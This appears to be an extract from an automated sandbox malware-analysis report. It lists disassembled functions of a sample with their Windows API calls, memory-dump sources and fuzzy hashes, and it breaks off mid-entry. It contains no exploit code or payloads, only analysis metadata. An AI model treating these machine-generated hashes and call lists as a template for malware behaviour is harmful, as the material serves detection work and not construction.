                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                                                • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                                                Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                                • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                • String ID:
                                                                                                • API String ID: 1358664141-0
                                                                                                • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                                                • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                                                Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 2880819207-0
                                                                                                • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                                                • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                                                Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                                                • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                                                • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                                                • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                                                • String ID:
                                                                                                • API String ID: 357397906-0
                                                                                                • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                                                • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                                Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __wsplitpath.LIBCMT ref: 0043392E
                                                                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                • __wsplitpath.LIBCMT ref: 00433950
                                                                                                • __wcsicoll.LIBCMT ref: 00433974
                                                                                                • __wcsicoll.LIBCMT ref: 0043398A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                • String ID:
                                                                                                • API String ID: 1187119602-0
                                                                                                • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                                                • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                                                Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                • String ID:
                                                                                                • API String ID: 1597257046-0
                                                                                                • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                                • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                                                • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                                • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                                                Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                                                • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                • String ID:
                                                                                                • API String ID: 237123855-0
                                                                                                • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                                                • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                                                Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: DeleteDestroyObject$IconWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3349847261-0
                                                                                                • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                                                • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                                                Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                • String ID:
                                                                                                • API String ID: 2223660684-0
                                                                                                • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                                                • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                                                Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                                                • LineTo.GDI32(?,?,?), ref: 00447326
                                                                                                • EndPath.GDI32(?), ref: 00447336
                                                                                                • StrokePath.GDI32(?), ref: 00447344
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                • String ID:
                                                                                                • API String ID: 2783949968-0
                                                                                                • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                                                • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                                                Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2710830443-0
                                                                                                • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                                                • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                                                Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                                                • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                                  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                                  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                • String ID:
                                                                                                • API String ID: 146765662-0
                                                                                                • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                                                • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                                                Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDesktopWindow.USER32 ref: 00472B63
                                                                                                • GetDC.USER32(00000000), ref: 00472B6C
                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2889604237-0
                                                                                                • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                                                • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                                                Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDesktopWindow.USER32 ref: 00472BB2
                                                                                                • GetDC.USER32(00000000), ref: 00472BBB
                                                                                                • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2889604237-0
                                                                                                • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
